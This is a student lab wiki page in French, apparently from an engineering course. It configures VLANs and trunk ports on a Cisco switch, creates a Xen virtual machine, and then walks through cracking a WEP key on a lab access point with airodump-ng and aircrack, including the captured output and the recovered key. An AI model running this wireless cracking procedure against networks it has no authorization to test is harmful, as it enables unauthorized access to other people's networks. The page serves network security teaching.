Cahier 2016 groupe n°7

De Wiki de Projets IMA

Cahier des charges

Mise en réseau des commutateurs 6006 en E304

Avancement du travail

Configuration du 6006

-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10

-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11

-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.

La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :

1 Switch-E304>enable
2 Switch-E304#vlan database
3 Switch-E304(vlan)#vlan x name nameX
4 Switch-E304(vlan)#exit

La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :

1 Switch-E304>enable
2 Switch-E304#conf t
3 Switch-E304(config)#interface GigabitEthernet 4/x
4 Switch-E304(config-if)#switchport
5 Switch-E304(config-if)#switchport access vlan x
6 Switch-E304(config-if)#no shutdown
7 Switch-E304(config-if)#end
8 Switch-E304#write memory (enregistrer la configuration)

Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :

5 Switch-E304(config-if)#switchport mode trunk

Installation de xen

 xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie 
 --dir=/usr/local/xen --gateway=193.48.57.172

Crackage de clé WEP

Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP. Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2

On obtient l'écran suivant :

CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         
                                                                                                                                    
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                    
04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              
04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 
04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 
04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 
04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  
04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         <length:  0>                                                
04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 
04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         <length:  0>                                               
04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 
44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  
                                                                                                                                    
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            
                                                                                                                                     
04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   
04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   
04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   
04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   
04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   
04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   
04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   
04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   
(not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   
(not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   
44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2

Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :

airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2

On obtient l'écran suivant :

CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         
                                                                                                                                    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                    
04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             
                                                                                                                                    
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           
                                                                                                                                    
04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 

Une fois le fichier de capture créé, nous avons exécuter la commande

aircrack cracotte06-01.cap

afin débuter le crackage de la clé WEP.

On obtient le résultat suivant en quelques minutes :

                [00:01:53] Tested 279622 keys (got 31535 IVs)
  KB    depth   byte(vote)
   0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) 
   1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) 
   2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) 
   3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) 
   4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) 
   5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) 
   6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) 
   7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) 
   8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) 
   9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) 
  10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) 
  11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) 
  12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) 
            KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] 

Decrypted correctly: 100%

La clé a été trouver et sa valeur est "EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44"